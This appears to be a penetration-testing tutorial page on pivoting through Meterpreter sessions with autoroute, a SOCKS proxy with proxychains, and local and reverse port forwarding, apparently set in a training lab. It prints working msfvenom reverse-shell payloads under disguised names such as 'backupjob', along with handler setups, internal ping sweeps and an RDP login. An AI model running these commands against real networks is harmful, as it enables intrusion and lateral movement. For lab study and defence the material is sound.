Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

🏠 Back to Blog

Meterpreter Tunneling & Port Forwarding

Create pivots using Meterpreter sessions without relying on SSH port forwarding. Useful when you already have a Meterpreter shell on a pivot host and want to enumerate or exploit hosts on an internal network.

Setting Up the Meterpreter Session on the Pivot Host

Step 1: Create Payload for the Ubuntu Pivot Host

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 -f elf -o backupjob LPORT=8080

Step 2: Configure & Start the multi/handler

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8080
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

Step 3: Execute the Payload on the Pivot Host

Copy the binary to the pivot host over SSH and run it:

chmod +x backupjob
./backupjob

Confirm the session is established:

[*] Sending stage (3020772 bytes) to 10.129.202.64
[*] Meterpreter session 1 opened (10.10.14.18:8080 -> 10.129.202.64:39826)
meterpreter > pwd
/home/ubuntu

Ping Sweeps Through the Pivot

Using Meterpreter’s ping_sweep Module

meterpreter > run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23

Ping Sweep For Loop on Linux Pivot Hosts

for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done

Ping Sweep For Loop Using CMD

for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"

Ping Sweep Using PowerShell

1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.16.5.$($_) -quiet)"}

Note: A ping sweep may not return results on the first attempt due to ARP cache build time. Run it at least twice. If ICMP is blocked by a firewall, use a TCP scan instead.

SOCKS Proxy with Metasploit (AutoRoute + proxychains)

Instead of SSH dynamic port forwarding, use Metasploit’s socks_proxy module to create a local SOCKS proxy that routes traffic through the Meterpreter session.

Step 1: Configure MSF’s SOCKS Proxy

msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 9050
msf6 auxiliary(server/socks_proxy) > set SRVHOST 0.0.0.0
msf6 auxiliary(server/socks_proxy) > set version 4a
msf6 auxiliary(server/socks_proxy) > run

Confirm the proxy is running:

msf6 auxiliary(server/socks_proxy) > jobs

Jobs
====

  Id  Name                           Payload  Payload opts
  --  ----                           -------  ------------
  0   Auxiliary: server/socks_proxy

Step 2: Configure proxychains

Add (or verify) this line at the end of /etc/proxychains.conf:

socks4  127.0.0.1 9050

Note: Depending on the SOCKS server version, you may need to change socks4 to socks5.

Step 3: Create Routes with AutoRoute

Option A: Using the post module

msf6 > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set SESSION 1
msf6 post(multi/manage/autoroute) > set SUBNET 172.16.5.0
msf6 post(multi/manage/autoroute) > run

Option B: From the Meterpreter session directly

meterpreter > run autoroute -s 172.16.5.0/23

Step 4: Verify Active Routes

meterpreter > run autoroute -p

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.129.0.0         255.255.0.0        Session 1
   172.16.4.0         255.255.254.0      Session 1
   172.16.5.0         255.255.254.0      Session 1

Step 5: Test Proxy & Routing

proxychains nmap 172.16.5.19 -p3389 -sT -v -Pn

Example output:

|S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.19:3389-<><>-OK
Discovered open port 3389/tcp on 172.16.5.19

Meterpreter Port Forwarding (portfwd)

Use Meterpreter’s portfwd module to forward ports through the session without needing proxychains.

portfwd Options

meterpreter > help portfwd

Usage: portfwd [-h] [add | delete | list | flush] [args]

OPTIONS:

    -h        Help banner.
    -i <opt>  Index of the port forward entry to interact with (see the "list" command).
    -l <opt>  Forward: local port to listen on. Reverse: local port to connect to.
    -L <opt>  Forward: local host to listen on (optional). Reverse: local host to connect to.
    -p <opt>  Forward: remote port to connect to. Reverse: remote port to listen on.
    -r <opt>  Forward: remote host to connect to.
    -R        Indicates a reverse port forward.

Creating a Local TCP Relay

Forward local port 3300 to the Windows target’s RDP port:

meterpreter > portfwd add -l 3300 -p 3389 -r 172.16.5.19
[*] Local TCP relay created: :3300 <-> 172.16.5.19:3389

Then connect via RDP through the forwarded port:

xfreerdp /v:localhost:3300 /u:victor /p:pass@123

Verify with netstat:

netstat -antp
# tcp   0   0 127.0.0.1:54652   127.0.0.1:3300   ESTABLISHED 4075/xfreerdp

Meterpreter Reverse Port Forwarding

Use reverse port forwarding when you want a compromised host on the internal network to send a shell back through the pivot host to your attack host.

Step 1: Create Reverse Port Forward Rule

From the Meterpreter session on the pivot host, forward all connections received on port 1234 to your attack host on port 8081:

meterpreter > portfwd add -R -l 8081 -p 1234 -L 10.10.14.18
[*] Local TCP relay created: 10.10.14.18:8081 <-> :1234

Step 2: Configure & Start multi/handler for Windows

meterpreter > bg
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LPORT 8081
msf6 exploit(multi/handler) > set LHOST 0.0.0.0
msf6 exploit(multi/handler) > run

Step 3: Generate the Windows Payload

The payload connects back to the pivot host (not directly to the attack host):

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=1234

Step 4: Execute the Payload on the Windows Target

Once the payload runs on the Windows host, the connection flows:

Windows (172.16.5.19:1234) → Pivot (172.16.5.129:1234) → SSH/Meterpreter → Attack Host (10.10.14.18:8081)

Confirm the session:

[*] Started reverse TCP handler on 0.0.0.0:8081
[*] Sending stage (200262 bytes) to 10.10.14.18
[*] Meterpreter session 2 opened (10.10.14.18:8081 -> 10.10.14.18:40173)

meterpreter > shell
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\>

When to Use

  • Already have a Meterpreter session on the pivot host
  • Need SOCKS proxy routing without SSH access
  • Want to forward specific ports through the pivot (portfwd)
  • Need reverse port forwarding for internal hosts that cannot reach the attack host directly
  • Prefer Metasploit’s integrated tooling over manual SSH tunnels